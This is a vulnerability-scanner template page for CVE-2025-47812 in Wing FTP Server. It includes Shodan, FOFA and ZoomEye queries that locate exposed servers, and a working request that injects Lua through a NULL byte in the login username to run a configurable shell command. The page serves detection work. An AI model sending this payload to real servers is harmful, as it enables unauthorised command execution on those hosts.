Wing FTP Server <= 7.4.3 - Remote Code Execution
CVE-2025-47812
Early Release
Description
Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812). The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
Severity
Critical
CVSS Score
9.8
Exploit Probability
97%
Affected Product
wftpserver
Published Date
July 1, 2025
Template Author
rcesecurity, 4m3rr0r
CVE-2025-47812.yaml
id: CVE-2025-47812 info: name: Wing FTP Server <= 7.4.3 - Remote Code Execution author: rcesecurity,4m3rr0r severity: critical description: | Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812). The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server. reference: - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/ - https://github.com/4m3rr0r/CVE-2025-47812-poc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-47812 epss-score: 0.97 epss-percentile: 0.99 metadata: verified: true product: wftpserver vendor: wing_ftp_server shodan-query: - http.html_hash:2121146066 - http.favicon.hash:963565804 - title:"Wing FTP Server" - "Server: Wing FTP Server" fofa-query: - icon_hash="963565804" - title="Wing FTP Server" - "Server: Wing FTP Server" zoomeye-query: - app="Wing FTP Server" tags: cve,cve2025,rce,wingftp,ftp,unauth variables: cmd: "echo CVE-2025-47812" http: - raw: - | POST /loginok.html HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password= - raw: - | GET /dir.html HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(to_lower(body), "cve-2025-47812")' condition: and # digest: 4b0a0048304602210086e6de6403641ae1d7c2b4e2fda239c45edeee6f6fb067f2fbdda234b67e79e502210090ee323cfc7e014e8ee545f64d15c176aa1d1f02c7a07dc3450b10df42f2dd17:922c64590222798bb761d5b6d8e72950
9.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-47812